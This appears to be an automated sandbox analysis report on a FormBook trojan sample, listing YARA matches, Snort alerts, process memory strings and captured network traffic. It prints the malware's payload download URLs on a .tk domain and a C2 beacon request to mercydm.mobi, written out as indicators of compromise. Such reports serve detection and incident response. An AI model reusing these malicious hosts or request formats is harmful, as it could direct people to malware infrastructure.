Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000003.00000003.268178554.0000000000F19000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000003.369800371.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.367713798.00000000028E9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: aspnet_compiler.pdb source: cmd.exe, 0000000E.00000002.524907250.00000000031EF000.00000004.10000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000002.521097994.00000000027ED000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BFXBNFDHDJNG.pdb source: U8RYIwIvfK.exe
Source:	Binary string: cmd.pdb source: aspnet_compiler.exe, 00000003.00000003.366743571.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000000.367246738.00000000001B0000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001C245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	14_2_001C245C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001BB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	14_2_001BB89C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001C68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	14_2_001C68BA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001D31DC FindFirstFileW,FindNextFileW,FindClose,	14_2_001D31DC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001B85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	14_2_001B85EA

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00A9B29C
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00A97E20
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00A97E44
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00A97E5C
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00A9BB1C
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_00A9B74C

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.mercydm.mobi
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2018856 ET TROJAN Windows executable base64 encoded 50.115.174.192:443 -> 192.168.2.6:49704
Source: Traffic	Snort IDS: 2012811 ET DNS Query to a .tk domain - Likely Hostile 192.168.2.6:59575 -> 8.8.8.8:53

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.ept-egy.com/zx85/

Source: Joe Sandbox View

ASN Name: VIRPUS VIRPUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /tt/ptrr.txt HTTP/1.1Host: tgc8x.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tt/BLACKDEV.txt HTTP/1.1Host: tgc8x.tk
Source: global traffic	HTTP traffic detected: GET /zx85/?Sl=JSAN+BGUWbFIio0Y6cR2moHwDIFZVOq3R3uV7C0AfntmXLYJvKIE34aC+rLPWCkZ7Yk0ST8b/A==&7ntH=U0D8yn_PIXqTt HTTP/1.1Host: www.mercydm.mobiConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 50.115.174.192 50.115.174.192

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 03 Nov 2022 11:41:36 GMTContent-Type: text/htmlContent-Length: 291ETag: "635276ab-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Source: U8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: U8RYIwIvfK.exe, 00000000.00000002.267602853.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tgc8x.tk
Source: explorer.exe, 00000004.00000000.295686843.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.352239311.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.315487552.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.270907548.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.341973422.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: U8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tgc8x.tk
Source: U8RYIwIvfK.exe, 00000000.00000002.267602853.0000000002677000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.268543578.0000000002755000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tgc8x.tk/tt/BLACKDEV.txt
Source: U8RYIwIvfK.exe, 00000000.00000002.268352878.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.267602853.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tgc8x.tk/tt/ptrr.txt
Source: U8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tgc8x.tk4
Source: U8RYIwIvfK.exe, 00000000.00000002.268543578.0000000002755000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tgc8x.tkD8

Source: unknown

DNS traffic detected: queries for: tgc8x.tk

Source: global traffic	HTTP traffic detected: GET /tt/ptrr.txt HTTP/1.1Host: tgc8x.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tt/BLACKDEV.txt HTTP/1.1Host: tgc8x.tk
Source: global traffic	HTTP traffic detected: GET /zx85/?Sl=JSAN+BGUWbFIio0Y6cR2moHwDIFZVOq3R3uV7C0AfntmXLYJvKIE34aC+rLPWCkZ7Yk0ST8b/A==&7ntH=U0D8yn_PIXqTt HTTP/1.1Host: www.mercydm.mobiConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

HTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.6:49701 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: U8RYIwIvfK.exe PID: 5840, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 6120, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmd.exe PID: 5916, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: U8RYIwIvfK.exe PID: 5840, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 6120, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 5916, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A928D0	0_2_00A928D0
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A97820	0_2_00A97820
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A9D048	0_2_00A9D048
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A90448	0_2_00A90448
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A98188	0_2_00A98188
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A9E1E0	0_2_00A9E1E0
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A94158	0_2_00A94158
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A98A20	0_2_00A98A20
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A9BE38	0_2_00A9BE38
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A93278	0_2_00A93278
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A9C7D0	0_2_00A9C7D0
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A91F68	0_2_00A91F68
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A928C0	0_2_00A928C0
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A98C20	0_2_00A98C20
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A90438	0_2_00A90438
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A9D031	0_2_00A9D031
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A98C30	0_2_00A98C30
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A95C00	0_2_00A95C00
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A97810	0_2_00A97810
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A9405F	0_2_00A9405F
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A9E1D3	0_2_00A9E1D3
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A96508	0_2_00A96508
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A96518	0_2_00A96518
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A98178	0_2_00A98178
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A96950	0_2_00A96950
